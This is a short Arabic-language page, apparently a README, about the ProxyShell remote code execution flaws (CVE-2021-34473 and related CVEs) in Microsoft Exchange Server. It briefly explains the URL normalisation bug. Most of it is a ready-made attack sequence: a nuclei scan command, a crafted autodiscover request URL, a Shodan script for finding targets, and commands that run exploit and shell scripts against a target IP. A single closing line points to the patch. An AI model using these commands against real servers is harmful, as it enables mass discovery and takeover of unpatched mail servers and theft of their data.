
CVE-2021-34473 ثغرة تنفيذ التعليمات البرمجية عن بُعد في Microsoft Exchange Server
CVE-2021-34473 ثغرة تنفيذ التعليمات البرمجية عن بُعد في خادم Microsoft Exchange. تسمح لنا عملية تطبيع عناوين URL المعيبة هذه بالوصول إلى عنوان URL خلفي عشوائي أثناء التشغيل بحساب جهاز خادم Exchange. وعلى الرغم من أن هذه الثغرة ليست بقوة SSRF في ProxyLogon، وأننا نستطيع التعامل مع جزء المسار فقط من عنوان URL، إلا أنها لا تزال قوية بما يكفي لتنفيذ هجمات إضافية مع وصول خلفي عشوائي.
ماسح nuclei لثغرة Proxyshell RCE (CVE-2021-34423,CVE-2021-34473,CVE-2021-31207) التي اكتشفها orange tsai في Pwn2Own، والتي تؤثر على خادم Microsoft Exchange.
nuclei -u target.com -t proxyshell.yaml
https://xxx.xxx.xxx.xxx/autodiscover/[email protected]/mapi/nspi/?&Email=autodiscover/autodiscover.json%[email protected]
sudo python3 shodan-query.py
sudo python3 ProxyShell.py -u https://<IP>
python2 /manual/check.py
sudo python3 /manual/proxyshell.py
python2 /manual/shell.py
طبّق التحديثات الأمنية الموجودة هنا: CVE-2021-34473